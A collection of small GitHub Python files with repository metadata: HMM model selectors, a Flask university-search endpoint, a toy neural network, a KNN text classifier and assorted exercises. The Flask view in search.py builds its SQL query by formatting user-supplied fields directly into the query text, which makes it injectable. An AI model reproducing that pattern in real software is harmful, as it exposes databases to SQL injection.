0183493e05a780be89391b1fbb9d5cc5d38b1490 | 92b544bcfef1c84af63c26352f9b7320a3646c70 | /newfile.py | f0e5554c5d285d4eaf79f414bfa323d887514a25 | [] | no_license | IKRunner/newGitTest | 431c88514807107cf4d92e77896d26ed5dea8b02 | 466caf8582eacf70b1e9022a93b9bda001f2ef15 | refs/heads/main | 2023-03-20T09:18:39.833100 | 2021-03-19T06:34:52 | 2021-03-19T06:34:52 | 349,304,027 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 42 | py | # fsfsfsd
# New iten in adlkfjadl ppppppp | [
"iachilihu@gmail.com"
] | iachilihu@gmail.com |
fae007629c51a3cee178d03c6c3f04a26b153838 | 239bdd0c6aa252de5f3edd1a7a4fd54eaa29f89d | /PPL-assignment/Class -2/mains.py | 932aad591f5616fcaca6bb2fbea24c8756bf2476 | [] | no_license | aawesh2000/PPL-Assignment- | a19d23907273b5d90ffca3f6fd373f6079a6431f | 918daa3e99a353fa8967e5df5029fc5ade225268 | refs/heads/master | 2022-12-28T13:43:31.808653 | 2020-10-01T07:56:20 | 2020-10-01T07:56:20 | 300,231,752 | 0 | 1 | null | 2020-10-09T06:56:58 | 2020-10-01T10:02:19 | null | UTF-8 | Python | false | false | 215 | py | from animal import *
from shapes import * # modularity
t = Tiger()
t.set_limbs(4)
t.show()
m = Man()
m.set_limbs(2, 2)
m.show()
c = Circle()
c.details(True, True)
c.show()
r = Square()
r.details(True)
r.show()
| [
"noreply@github.com"
] | noreply@github.com |
a37f808f292fbec37ef54a374b4b99844add9867 | 498a179cce7ba11c493dac2e1eb519ee10a42698 | /Recognizer/my_model_selectors.py | 7c28fa01b03faff96b7f9afcb21ad46eb98f2f5a | [
"Apache-2.0"
] | permissive | thealokkr/AI-Algorithms | b177f94309daf0f4bbab18fb8931d4d2976a5bf3 | 1632f4b324f5f791adae0d92239770a870d1a49a | refs/heads/master | 2021-07-09T09:38:42.677401 | 2019-03-13T06:01:02 | 2019-03-13T06:01:02 | 148,180,111 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,763 | py | import math
import statistics
import warnings
import numpy as np
from hmmlearn.hmm import GaussianHMM
from sklearn.model_selection import KFold
from asl_utils import combine_sequences
class ModelSelector(object):
'''
base class for model selection (strategy design pattern)
'''
def __init__(self, all_word_sequences: dict, all_word_Xlengths: dict, this_word: str,
n_constant=3,
min_n_components=2, max_n_components=10,
random_state=14, verbose=False):
self.words = all_word_sequences
self.hwords = all_word_Xlengths
self.sequences = all_word_sequences[this_word]
self.X, self.lengths = all_word_Xlengths[this_word]
self.this_word = this_word
self.n_constant = n_constant
self.min_n_components = min_n_components
self.max_n_components = max_n_components
self.random_state = random_state
self.verbose = verbose
def select(self):
raise NotImplementedError
def base_model(self, num_states):
# with warnings.catch_warnings():
warnings.filterwarnings("ignore", category=DeprecationWarning)
# warnings.filterwarnings("ignore", category=RuntimeWarning)
try:
hmm_model = GaussianHMM(n_components=num_states, covariance_type="diag", n_iter=1000,
random_state=self.random_state, verbose=False).fit(self.X, self.lengths)
if self.verbose:
print("model created for {} with {} states".format(self.this_word, num_states))
return hmm_model
except:
if self.verbose:
print("failure on {} with {} states".format(self.this_word, num_states))
return None
class SelectorConstant(ModelSelector):
""" select the model with value self.n_constant
"""
def select(self):
""" select based on n_constant value
:return: GaussianHMM object
"""
best_num_components = self.n_constant
return self.base_model(best_num_components)
class SelectorBIC(ModelSelector):
""" select the model with the lowest Baysian Information Criterion(BIC) score
http://www2.imm.dtu.dk/courses/02433/doc/ch6_slides.pdf
Bayesian information criteria: BIC = -2 * logL + p * logN
"""
def bic_score(self, n):
"""
Return the bic score
"""
model = self.base_model(n)
logL = model.score(self.X, self.lengths)
logN = np.log(len(self.X))
# p = = n^2 + 2*d*n - 1
d = model.n_features
p = n ** 2 + 2 * d * n - 1
return -2.0 * logL + p * logN, model
def select(self):
""" select the best model for self.this_word based on
BIC score for n between self.min_n_components and self.max_n_components
:return: GaussianHMM object
"""
warnings.filterwarnings("ignore", category=DeprecationWarning)
try:
best_score = float("Inf")
best_model = None
for n in range(self.min_n_components, self.max_n_components + 1):
score, model = self.bic_score(n)
if score < best_score:
best_score, best_model = score, model
return best_model
except:
return self.base_model(self.n_constant)
class SelectorDIC(ModelSelector):
''' select best model based on Discriminative Information Criterion
Biem, Alain. "A model selection criterion for classification: Application to hmm topology optimization."
Document Analysis and Recognition, 2003. Proceedings. Seventh International Conference on. IEEE, 2003.
http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.58.6208&rep=rep1&type=pdf
DIC = log(P(X(i)) - 1/(M-1)SUM(log(P(X(all but i))
'''
def dic_score(self, n):
"""
Return the dic score based on likehood
"""
model = self.base_model(n)
scores = []
for word, (X, lengths) in self.hwords.items():
if word != self.this_word:
scores.append(model.score(X, lengths))
return model.score(self.X, self.lengths) - np.mean(scores), model
def select(self):
warnings.filterwarnings("ignore", category=DeprecationWarning)
try:
best_score = float("-Inf")
best_model = None
for n in range(self.min_n_components, self.max_n_components + 1):
score, model = self.dic_score(n)
if score > best_score:
best_score = score
best_model = model
return best_model
except:
return self.base_model(self.n_constant)
class SelectorCV(ModelSelector):
''' select best model based on average log Likelihood of cross-validation folds
'''
def select(self):
warnings.filterwarnings("ignore", category=DeprecationWarning)
best_score, best_n_components = None, None
for n_components in range(self.min_n_components, self.max_n_components + 1):
scores, n_splits = [], 3
if (len(self.sequences) < 3):
try:
model = GaussianHMM(n_components=n_components, n_iter=1000).fit(self.X, self.lengths)
logL = model.score(self.X, self.lengths)
if (best_score is None or logL > best_score):
best_score, best_n_components = logL, n_components
except Exception as e:
# Skip cross-validation for current n_components
continue
else:
split_method = KFold(random_state=self.random_state, n_splits=n_splits)
for cv_train_idx, cv_test_idx in split_method.split(self.sequences):
X_train, lengths_train = combine_sequences(cv_train_idx, self.sequences)
X_test, lengths_test = combine_sequences(cv_test_idx, self.sequences)
try:
model = GaussianHMM(n_components=n_components, n_iter=1000).fit(X_train, lengths_train)
logL = model.score(X_test, lengths_test)
scores.append(logL)
except Exception as e:
break
training_successful = len(scores) == n_splits
if (not training_successful): continue
avg = np.average(scores)
if (best_score is None or avg > best_score):
best_score, best_n_components = avg, n_components
if (best_score == None):
best_n_components = 3
return self.base_model(best_n_components)
| [
"noreply@github.com"
] | noreply@github.com |
e739c6d1ddb77e7148a871dcd36bce0dfe716734 | b44cc62938ffd5e032097f2eefb2ff16bb3d630f | /app/views/search.py | b0e98cbd73c2da9f3bdf3fbe2be38f473dcd5633 | [] | no_license | rajeshagashe/universitySearch | 3761c170e0b0615af4e29bc8e85294732c98abac | 4bf2f60899a5c95f09ae4d4c429bbb40b3099b44 | refs/heads/master | 2022-12-02T03:55:47.629533 | 2020-08-10T19:56:47 | 2020-08-10T19:56:47 | 286,098,982 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,153 | py | from flask import (
Blueprint, request
)
from app.models.universities import UniversityInfo
from app.extensions import postgres_db
import traceback
import json
from flask_sqlalchemy import SQLAlchemy
search_blueprint = Blueprint('search', __name__)
@search_blueprint.route('/universities', methods=["POST"])
def view():
try:
return_list = []
request_json = request.get_json()
query = """ Select
* from university_info
Where
name like \'%{}%\'
""".format(request_json.get('name', ''),)
if request_json.get('country_codes', False):
alpha_two_codes = '('
for each in request_json.get('country_codes'):
alpha_two_codes += '\'' + str(each) + '\'' ','
if alpha_two_codes[-1] == ',':
alpha_two_codes = alpha_two_codes[:-1]
alpha_two_codes += ')'
query += """AND
alpha_two_code in {}""".format(alpha_two_codes)
if request_json.get('domains', False):
domains = '\'('
for each in request_json.get('domains'):
domains += str(each) + '|'
if domains[-1] == '|':
domains = domains[:-1]
domains += ')\''
query += """AND
domain ~ {}""".format(domains)
offset = int(request_json.get('offset', '0'))
limit = int(request_json.get('limit', '10'))
query += ''' limit {} offset {}'''.format(limit, offset)
result = postgres_db.session.execute(query)
for each in result:
aux_dict = {}
aux_dict['id'] = each[0]
aux_dict['alpha_two_code'] = each[1]
aux_dict['country'] = each[2]
aux_dict['domain'] = each[3]
aux_dict['name'] = each[4]
aux_dict['web_page'] = each[5]
return_list.append(aux_dict)
return json.dumps(return_list)
except:
traceback.print_exc()
return 'Something went wrong.' | [
"rajeshagashe94@gmail.com"
] | rajeshagashe94@gmail.com |
392f89400bb41debeaf5b43d922ac73a8730406f | 68a3913a23da6187e41c0aae4f9b06075e9c248e | /project files/pytorch-neural-network.py | c1e0cef6cc06e596b4cc8e00e47542712ed5c410 | [] | no_license | AustinCai/RedditComment_MulticlassClassification | ca6df3fdeba6fb6f0b43ffbdd9c52dc0926bec21 | a4f2be7bcc43770d81a7f4db0f2340fc7101776e | refs/heads/master | 2020-06-01T20:51:36.739149 | 2019-09-21T14:57:30 | 2019-09-21T14:57:30 | 190,922,596 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,127 | py | # CS 221 Neural Netork Implementation
'''
Erick Fidel Siavichay-Velasco |
This file contains a neural network implementation using PyTorch v1.1.0
'''
# Packages needed
import sys
import pickle
import torch
from torch.autograd import Variable
import torch.nn as nn
import numpy as np
class Neural_Network(nn.Module):
def __init__(self, ):
super(Neural_Network, self).__init__()
# Parameters
# Current state:
# 3 layer model; input layer with 300 neurons (number of features)
# 1 hidden layer, with 3 neurons
# 1 output layer, with 1 neuron
self.inputSize = 300
self.hiddenSize = 3
self.outputSize = 1
# Learning rate
# bigger means faster convergence but less accuracy
# smaller means slower convergence but more accuracy
self.alpha = 0.1
# Thetas, randomly initialize
self.W1 = torch.randn(self.hiddenSize, self.inputSize) # Should be (3x300)
self.W2 = torch.randn(self.outputSize, self.hiddenSize) # Should be (1x3)
# Performs forward propagation with input X
def forward(self, X):
self.z1 = torch.matmul(self.W1, X)
self.a1 = self.sigmoid(self.z1) #Should be (3xNUM_FEATURES)
self.z2 = torch.matmul(self.W2, self.a1)
a2 =self.sigmoid(self.z2) # y hat, actual hypthesis
return a2
# a2 should be the prediction vector, and it should just be a scalar...not a vector
# This is returning 1x3 for some reason. unclear what is happening to the matrix multiplication in forward()
# if a2.item().item() <= 0.5:
# return 0
# else:
# return 1
# activation functions, can change later
def sigmoid(self, s):
return 1 / (1 + torch.exp(-s))
def sigmoidPrime(self, s):
return s * (1 - s)
# Performs back prop
def backward(self, X, y, a2):
#Debug statements: why aren't a2 and y same dimension???
print("y size: ", y.size())
print("a2 size: ", a2.size())
self.a2_error = y - a2 # error in output
self.a2_delta = self.a2_error * self.sigmoidPrime(a2) # derivative of sig to error
self.a1_error = torch.matmul(torch.t(self.W2),self.a2_delta)
self.a1_delta = self.a1_error * self.sigmoidPrime(self.a1)
self.W1 += torch.matmul(self.a1_delta, torch.t(X))*(self.alpha)
self.W2 += torch.matmul(self.a2_delta, torch.t(self.a1))*(self.alpha)
def train(self, X, y):
# forward + backward pass for training
a2 = self.forward(X)
self.backward(X, y, a2)
def saveWeights(self, model):
# we will use the PyTorch internal storage functions
torch.save(model, "NN")
# you can reload model with all the weights and so forth with:
# torch.load("NN")
def predict(self, xPredicted):
print ("Predicted data based on trained weights: ")
# print ("Input (scaled): \n" + str(xPredicted))
print ("Prediction: \n" + str(self.forward(xPredicted)))
| [
"acai21@stanford.edu"
] | acai21@stanford.edu |
f70701fd609628325e07ae636ee846ef48abe1ca | 37f4c86c2a6b45c86aa9544fa8eb2b1846fc30a1 | /Intro_Simple_Functions/Hospital.py | c09eb03a42efa0b234906d01f1320db2725281e8 | [] | no_license | mrbmadrid/Flask_Color_Picker | 2571e9ff62d54c94cd48b7cf4de64ae8ef06c4c3 | 7323e41c6377b3d9eec80984ecb56629e5c11fdd | refs/heads/master | 2020-03-08T23:17:48.004055 | 2018-04-06T19:38:22 | 2018-04-06T19:38:22 | 128,458,573 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,448 | py | class Patient(object):
def __init__(self, id_num, name, allergies):
self.id = id_num
self.name = name
self.allergies = allergies
self.bed_num = -1
def display(self):
print str(self.id), self.name, self.allergies, str(self.bed_num)
class Hospital(object):
def __init__(self, name, capacity):
self.name = name
self.capacity = capacity
self.patients = []
for count in range (0, capacity):
self.patients.append("empty")
def admit(self, patient):
index = 0
assigned = False
while(index < self.capacity and not assigned):
if self.patients[index] == "empty":
self.patients[index] = patient
patient.bed_num = index+1
print "Patient "+str(patient.id)+" " + patient.name+" assigned to bed "+str(index+1)+" in "+self.name
assigned = True
index+=1
if not assigned:
print self.name + " is full."
def release(self, name):
for patient in self.patients:
if type(patient) is Patient and patient.name.lower() == name.lower():
patient.bed_num = -1
print "Releasing "+patient.name
self.patients.insert(self.patients.index(patient), "empty")
self.patients.remove(patient)
def display(self):
for patient in self.patients:
if type(patient) is str:
pass
else:
patient.display()
h = Hospital("Tripler", 3)
h.admit(Patient(1, "brian", "mango"))
h.admit(Patient(2, "tim", "none"))
h.admit(Patient(3, "carl", "none"))
h.display()
h.release('Brian')
h.display()
| [
"mrbmadrid@gmail.com"
] | mrbmadrid@gmail.com |
564aff3730d2c16ce344e5ed8c48fcd218d1789c | ac8c31b5971161adf0b7e66d85effd0ec8f5b7dd | /Day 005/video50_E_5_2.py | 2d04f4a560b60b729707bffe0d83d77bd0142f99 | [] | no_license | satuhyva/100daysOfPython | 5f7e7e1959358bcb370f73abe0e5b9627acf01a2 | bdd93c290434aa05bcd52cd96d602bd72acc4a41 | refs/heads/master | 2023-08-17T01:10:35.218447 | 2021-09-20T05:59:15 | 2021-09-20T05:59:15 | 394,317,321 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 435 | py | # 🚨 Don't change the code below 👇
student_scores = input("Input a list of student scores ").split()
for n in range(0, len(student_scores)):
student_scores[n] = int(student_scores[n])
print(student_scores)
# 🚨 Don't change the code above 👆
#Write your code below this row 👇
highest = -1
for score in student_scores:
if score > highest:
highest = score
print(f"The highest score in the class is: {highest}")
| [
"hyvarinen.satu.i@gmail.com"
] | hyvarinen.satu.i@gmail.com |
213b094346320e7be74f72110762adf43b8b2af4 | 37af8c94c7e47bb9fee08263de8624bc59487735 | /TA(unigram).py | f80a996893176231c9c9fff00eab0c92d6ab5911 | [] | no_license | ilhamksyuriadi/TA | 0b2f046505dcd74f73fd98d88905f75891061317 | 347168d1f786e8a5b02819064a7f9d039b2cdd78 | refs/heads/master | 2020-04-17T11:05:05.398744 | 2019-07-01T15:28:02 | 2019-07-01T15:28:02 | 166,526,293 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,590 | py | # -*- coding: utf-8 -*-
"""
Created on Sun Dec 16 17:13:44 2018
@author: ilhamksyuriadi
"""
import xlrd
from nltk.tokenize import RegexpTokenizer
from Sastrawi.StopWordRemover.StopWordRemoverFactory import StopWordRemoverFactory
from Sastrawi.Stemmer.StemmerFactory import StemmerFactory
import numpy as np
import math
import time
start_time = time.time()  # wall-clock start; presumably used to report total runtime at the end of the script -- confirm
def LoadDataset(FileLoc):
    """Read texts and their three binary labels from an Excel workbook.

    The first sheet is used; the first two rows are skipped (treated as
    headers). Column 0 holds the raw text, columns 1-3 hold one binary
    label each.

    Returns a pair (texts, labels) where labels[i] is a list of three ints.
    Prints a running count of rows loaded.
    """
    texts, labels = [], []
    sheet = xlrd.open_workbook(FileLoc).sheet_by_index(0)
    for row in range(2, sheet.nrows):
        texts.append(sheet.cell_value(row, 0))
        labels.append([int(sheet.cell_value(row, col)) for col in (1, 2, 3)])
        print(len(texts), "data inserted")
    return texts, labels
def Preprocessing(data):
    """Clean each raw text into a list of normalized tokens.

    Steps per document: case folding, tokenization on word characters
    (which also drops punctuation), Indonesian stop-word removal
    (Sastrawi), then stemming (Sastrawi).

    Returns a list of token lists, one per input document.
    Prints a running count of documents cleaned.
    """
    tokenizer = RegexpTokenizer(r'\w+')
    stopwords = StopWordRemoverFactory().get_stop_words()
    stemmer = StemmerFactory().create_stemmer()
    cleaned = []
    for idx, text in enumerate(data, start=1):
        tokens = tokenizer.tokenize(text.lower())
        kept = [tok for tok in tokens if tok not in stopwords]
        cleaned.append([stemmer.stem(tok) for tok in kept])
        print(idx, "data cleaned")
    return cleaned
def CreateUnigram(data):
    """Build the unigram vocabulary: unique tokens in first-occurrence order.

    data: list of token lists (one per document).
    Returns a list of distinct tokens, ordered by first appearance.
    Prints a running count as each new token is added.

    Uses a set for the membership check instead of scanning the growing
    vocabulary list (the original was O(vocabulary) per token).
    """
    seen = set()
    unigram = []
    for doc in data:
        for token in doc:
            if token not in seen:
                seen.add(token)
                unigram.append(token)
                print(len(unigram), "unigram created")
    return unigram
def CreateDF(data, doc):
    """Compute document frequency for each term.

    data: list of vocabulary terms.
    doc:  list of token lists (one per document).
    Returns {term: number of documents containing the term}; terms that
    appear in no document are absent from the dict (as in the original).
    Prints a running count of (term, document) pairs examined.

    Each document's tokens are converted to a set once, so the membership
    test is O(1) instead of a linear scan per (term, document) pair.
    """
    df = {}
    doc_sets = [set(tokens) for tokens in doc]
    count = 0
    for term in data:
        for tokens in doc_sets:
            if term in tokens:
                df[term] = df.get(term, 0) + 1
            count += 1
            print(count, "df created")
    return df
def CreateTFIDF(data, df, unigram):
    """Build the TF-IDF matrix: one row per document, one column per term.

    data:    list of token lists (one per document).
    df:      {term: document frequency}; must contain every term that
             occurs in data, otherwise a KeyError is raised (as before).
    unigram: the vocabulary, fixing the column order.

    Cell value is tf * log10(N / df[term]) when the term occurs in the
    document, else 0. Returns a list of lists. Prints a running count of
    cells computed.

    Term frequencies are tallied once per document instead of rescanning
    the token list for every vocabulary term (the original was
    O(doclen) per cell).
    """
    tfidf = []
    n_docs = len(data)
    count = 0
    for doc in data:
        # One pass over the document to count every token.
        tf = {}
        for token in doc:
            tf[token] = tf.get(token, 0) + 1
        row = []
        for term in unigram:
            freq = tf.get(term, 0)
            if freq:
                idf = math.log10(n_docs / df[term])
                row.append(freq * idf)
            else:
                row.append(0)
            count += 1
            print(count, "tf-idf created")
        tfidf.append(row)
    return tfidf
def Euclidean(a, b):
    """Euclidean (L2) distance between two equal-length numeric vectors.

    Iterates by index over a, so b shorter than a raises IndexError,
    exactly as before.
    """
    squared_diffs = ((a[i] - b[i]) ** 2 for i in range(len(a)))
    return math.sqrt(sum(squared_diffs))
def KnnClassifier(K,train,test,actualLabel,data,cls):
    """Binary K-nearest-neighbour classifier.

    For every sample in `test`, computes the Euclidean distance to every
    row of `train`, takes the K closest, and predicts 1 when the "yes"
    (label 1) votes strictly outnumber the "no" (label 0) votes.
    `data` (split number) and `cls` (class name) are only used for the
    progress print-out. Returns the list of 0/1 predictions.
    """
    predict = []
    for idx, sample in enumerate(test):
        # distance to every training sample, paired with that sample's label
        neighbours = []
        for j, ref in enumerate(train):
            neighbours.append([Euclidean(sample, ref), int(actualLabel[j])])
        neighbours.sort()  # nearest first (ties broken by label)
        yes, no = 0, 0
        for k in range(K):
            if neighbours[k][1] == 0:
                no += 1
            elif neighbours[k][1] == 1:
                yes += 1
        temp = 2
        if yes > no:
            predict.append(1)
            temp = 1
        else:
            predict.append(0)
            temp = 0
        print("split:",data,",class:",cls,",data ke:",idx,"result:",temp)
        print("yes:",yes,"no:",no)
    return predict
def HammingLoss(actual,predict):
    """Mean per-sample Jaccard overlap between predicted and actual label rows.

    NOTE: despite the name this computes (1/N) * sum(|P&A| / (P|A| count)) —
    a Jaccard *accuracy*, not the Hamming loss. Raises ZeroDivisionError when
    a sample has no positive label in either row (unchanged from the
    original). Fix: the original hard-coded labels 0..2 in ~25 lines of
    copy-paste; this computes the same values for any row length.
    """
    value = 0
    for i in range(len(predict)):
        pred, act = predict[i], actual[i]
        # labels positive in both rows / labels positive in either row
        intersection = sum(1 for p, a in zip(pred, act) if p == 1 and a == 1)
        union = sum(1 for p, a in zip(pred, act) if p == 1 or a == 1)
        value = value + intersection / union
    return 1/len(predict)*value
# ---------- pipeline: load -> clean -> tf-idf ----------
FileLoc = "data.xlsx"
rawData,actualLabel = LoadDataset(FileLoc)
cleanData = Preprocessing(rawData)
unigram = CreateUnigram(cleanData)
df = CreateDF(unigram,cleanData)
dataTfidf = CreateTFIDF(cleanData,df,unigram)
#spliting data
# 4-fold cross-validation over the 1064 documents (folds of 266 docs).
# Labels are wrapped in numpy arrays so a single label column can be
# selected with [:, col] (0 = anjuran, 1 = larangan, 2 = informasi).
dataTrain1, dataTest1 = dataTfidf[0:798], dataTfidf[798:1064]
labelTrain1 = np.array(actualLabel[0:798])
dataTrain2, dataTest2 = dataTfidf[0:532]+dataTfidf[798:1064], dataTfidf[532:798]
labelTrain2 = np.array(actualLabel[0:532]+actualLabel[798:1064])
dataTrain3, dataTest3 = dataTfidf[0:266]+dataTfidf[532:1064], dataTfidf[266:532]
labelTrain3 = np.array(actualLabel[0:266]+actualLabel[532:1064])
dataTrain4, dataTest4 = dataTfidf[266:1064], dataTfidf[0:266]
labelTrain4 = np.array(actualLabel[266:1064])
# per-fold, per-class prediction lists (A/B/C = anjuran/larangan/informasi)
predict1A,predict1B,predict1C = [],[],[]
predict2A,predict2B,predict2C = [],[],[]
predict3A,predict3B,predict3C = [],[],[]
predict4A,predict4B,predict4C = [],[],[]
K = 14  # number of neighbours for KNN
#iteration for classify the data
for i in range(4):
    if i == 0:
        predict1A = KnnClassifier(K,dataTrain1,dataTest1,labelTrain1[:,0],1,"anjuran")
        predict1B = KnnClassifier(K,dataTrain1,dataTest1,labelTrain1[:,1],1,"larangan")
        predict1C = KnnClassifier(K,dataTrain1,dataTest1,labelTrain1[:,2],1,"informasi")
    elif i == 1:
        predict2A = KnnClassifier(K,dataTrain2,dataTest2,labelTrain2[:,0],2,"anjuran")
        predict2B = KnnClassifier(K,dataTrain2,dataTest2,labelTrain2[:,1],2,"larangan")
        predict2C = KnnClassifier(K,dataTrain2,dataTest2,labelTrain2[:,2],2,"informasi")
    elif i == 2:
        predict3A = KnnClassifier(K,dataTrain3,dataTest3,labelTrain3[:,0],3,"anjuran")
        predict3B = KnnClassifier(K,dataTrain3,dataTest3,labelTrain3[:,1],3,"larangan")
        predict3C = KnnClassifier(K,dataTrain3,dataTest3,labelTrain3[:,2],3,"informasi")
    else:
        predict4A = KnnClassifier(K,dataTrain4,dataTest4,labelTrain4[:,0],4,"anjuran")
        predict4B = KnnClassifier(K,dataTrain4,dataTest4,labelTrain4[:,1],4,"larangan")
        predict4C = KnnClassifier(K,dataTrain4,dataTest4,labelTrain4[:,2],4,"informasi")
# Fold 4 tested docs 0..265, fold 3 docs 266..531, fold 2 docs 532..797 and
# fold 1 docs 798..1063, so concatenating 4,3,2,1 restores document order.
predictA = predict4A + predict3A + predict2A + predict1A
predictB = predict4B + predict3B + predict2B + predict1B
predictC = predict4C + predict3C + predict2C + predict1C
predict = []
for i in range(len(predictA)):
    predict.append([predictA[i],predictB[i],predictC[i]])
hammingLost = HammingLoss(actualLabel,predict)
print(round(hammingLost*100,2),"%")
# NOTE(review): start_time is presumably set near the top of the file — confirm.
print("--- %s seconds ---" % (time.time() - start_time))
#code below for count actual and predict each class
# Per-class tallies of 0/1 labels, actual vs predicted.
anjuranActual0, anjuranActual1 = 0,0
laranganActual0, laranganActual1 = 0,0
informasiActual0, informasiActual1 = 0,0
anjuranPredict0, anjuranPredict1 = 0,0
laranganPredict0, laranganPredict1 = 0,0
informasiPredict0, informasiPredict1 = 0,0
for i in range(len(predict)):
    if actualLabel[i][0] == 0:
        anjuranActual0 += 1
    if actualLabel[i][0] == 1:
        anjuranActual1 += 1
    if actualLabel[i][1] == 0:
        laranganActual0 += 1
    if actualLabel[i][1] == 1:
        laranganActual1 += 1
    if actualLabel[i][2] == 0:
        informasiActual0 += 1
    if actualLabel[i][2] == 1:
        informasiActual1 += 1
    if predict[i][0] == 0:
        anjuranPredict0 += 1
    if predict[i][0] == 1:
        anjuranPredict1 += 1
    if predict[i][1] == 0:
        laranganPredict0 += 1
    if predict[i][1] == 1:
        laranganPredict1 += 1
    if predict[i][2] == 0:
        informasiPredict0 += 1
    if predict[i][2] == 1:
        informasiPredict1 += 1
| [
"noreply@github.com"
] | noreply@github.com |
89a5d4dbe3fcb3d203ce377c78cc21872e3748e3 | a5d53e75eb34639b3c17772ad610c73e3cf935d6 | /pep234.py | 2ff0ddf3151d70752a1ea01c508a43c8c3c9ceed | [] | no_license | pkral78/lf_async_python | 42100f5b1039aedcf11828d81695db20400ea932 | 06c7ffa48267db062b341a2001879d563fd511b0 | refs/heads/master | 2023-01-09T03:41:34.205932 | 2020-11-13T14:31:18 | 2020-11-13T14:31:18 | 312,598,166 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 423 | py | class even_iter:
    def __init__(self, iterable):
        """Wrap any iterable; iteration will yield only every other element."""
        self.iter = iter(iterable)
    def __iter__(self):
        """An even_iter is its own iterator (iterator protocol)."""
        return self
def __next__(self):
ret = next(self.iter)
try:
next(self.iter)
except StopIteration:
pass
return ret
# Demo: build 0..9, then compare plain iteration with the skip-one iterator.
a = list(range(0, 10))
print(a)
print(list(iter(a)))
print(iter(even_iter(a)))  # even_iter.__iter__ returns self, so this prints the object
print(list(even_iter(a)))
| [
"pavel.kral@gmail.com"
] | pavel.kral@gmail.com |
5c9589687551433145ec1f6425524429354fc77d | 75c653bbe8c919ff2ebe315fc24434f5cbce8d44 | /solver/settings.py | f8925afe8d608b5843089b04010897c85fe4a0ba | [] | no_license | piotrgajdzica/math-trade-solver | 5d7953c98595ea022fe713c244c1b60d71ee3113 | 7f8faa566a9c3c9dbeca462d50a2af60150a718a | refs/heads/master | 2020-03-18T09:21:30.381018 | 2018-12-06T13:37:24 | 2018-12-06T13:37:24 | 134,559,062 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 41 | py | group_prefix = "g"
element_prefix = "e"
| [
"p.gajdzica@labmatic.com"
] | p.gajdzica@labmatic.com |
4cfebf29e214868e5123ed92585040660fa48191 | d5b232efefd93d9ec0ee2014fcd22400dd2459a2 | /Python/multiprocessing/ex6_queue.py | 7cb3a117cd0d6d4224c160d43ef96291b33d9304 | [] | no_license | joohee/DailyCoding | cdac39a2362ec9a2e91a7f724c59e632167f45b7 | 9746628408ea269f696a15e84869ed5f16cca7f0 | refs/heads/master | 2020-04-06T13:53:58.785499 | 2016-10-27T06:39:32 | 2016-10-27T06:39:32 | 48,873,598 | 0 | 1 | null | 2016-03-03T06:24:54 | 2016-01-01T08:45:45 | Python | UTF-8 | Python | false | false | 216 | py | from multiprocessing import Process, Queue
def f(q):
    """Child-process target: put a fixed demo payload on the shared queue."""
    payload = [42, None, 'hello']
    q.put(payload)
if __name__ == '__main__':
    # Guard is required by multiprocessing on spawn platforms (e.g. Windows)
    # so the child interpreter does not re-execute this block on import.
    q = Queue()
    p = Process(target=f, args=(q,))
    p.start()
    print(q.get())  # blocks until the child has put its payload
    p.join()
| [
"neigie@gmail.com"
] | neigie@gmail.com |
69ba12d03ccafd8bcc5cf81900c9c8eaceb3f501 | 1fea2c8a6fcceb58caa4caa7bea4b9140bca5749 | /src/process_data.py | 87d42c9b65d4a7d3a642b6bd9f9549934dc7316a | [] | no_license | iamaziz/queue-system | 19691881b149e0420ca80925adf19a0d7d9b8ff1 | 00087f502db597cc2114c1cc254ad60c598e015a | refs/heads/master | 2020-05-17T23:53:56.447626 | 2015-10-16T00:58:28 | 2015-10-16T00:58:28 | 42,259,668 | 5 | 4 | null | null | null | null | UTF-8 | Python | false | false | 1,787 | py |
import pandas as pd
import matplotlib.pyplot as plt
in_file = "per-patient-data.csv"
# Fix: DataFrame.from_csv was deprecated and removed from pandas;
# read_csv is the documented replacement and, with index_col=False,
# loads the same frame (comma-separated, header row, no index column).
data = pd.read_csv(in_file, index_col=False)
# aggregate raw per-individual patients dataset
def daily_ticks():
    """Aggregate the per-patient rows (module-level `data`) into per-day totals.

    Returns:
        {'day_date': [n_admitted, n_leaving, n_admitted_to_ICU,
                      n_leaving_ICU, total_in_ICU, total_in_hospital]}

    Fix: the original's docstring sat inside the loop body, where it was a
    no-op string statement executed every iteration instead of documentation.
    """
    days = set(data.AdmitDay)
    total = 0    # running count of patients currently in hospital
    icroom = 0   # running count of patients currently in the ICU
    day_total = {}
    for d in sorted(days):
        # total patients on day d = admitted + still present - leaving
        came = len(data[data.AdmitDay == d])
        left = len(data[data.LeaveDay == d])
        total += came - left
        inicu = len(data[(data.AdmitDay == d) & (data.ICRoom == 'yes')])
        outicu = len(data[(data.LeaveDay == d) & (data.ICRoom == 'yes')])
        icroom += inicu - outicu
        day_total[d] = [came, left, inicu, outicu, icroom, total]
    return day_total
# write the processed data into a csv file
import csv
out_file = 'per-day-data.csv'
with open(out_file, 'w') as csvfile:
a = csv.writer(csvfile, delimiter=',')
a.writerow(['Date', 'InPatients', 'OutPatients', 'InICU', 'OutICU', 'ICUroomTotal', 'OverallTotal'])
entries = daily_ticks()
for k, v in sorted( entries.items() ):
row = []
row.append(k)
pin, pout, icuin, icuout, picu, ptotal = v
row.append(pin)
row.append(pout)
row.append(icuin)
row.append(icuout)
row.append(picu)
row.append(ptotal)
a.writerow(row)
print('processed the per-patient dataset:\n\t{}\nand generated the aggregated new dataset into:\n\t{}'.format(in_file, out_file)) | [
"iamaziz.alto@gmail.com"
] | iamaziz.alto@gmail.com |
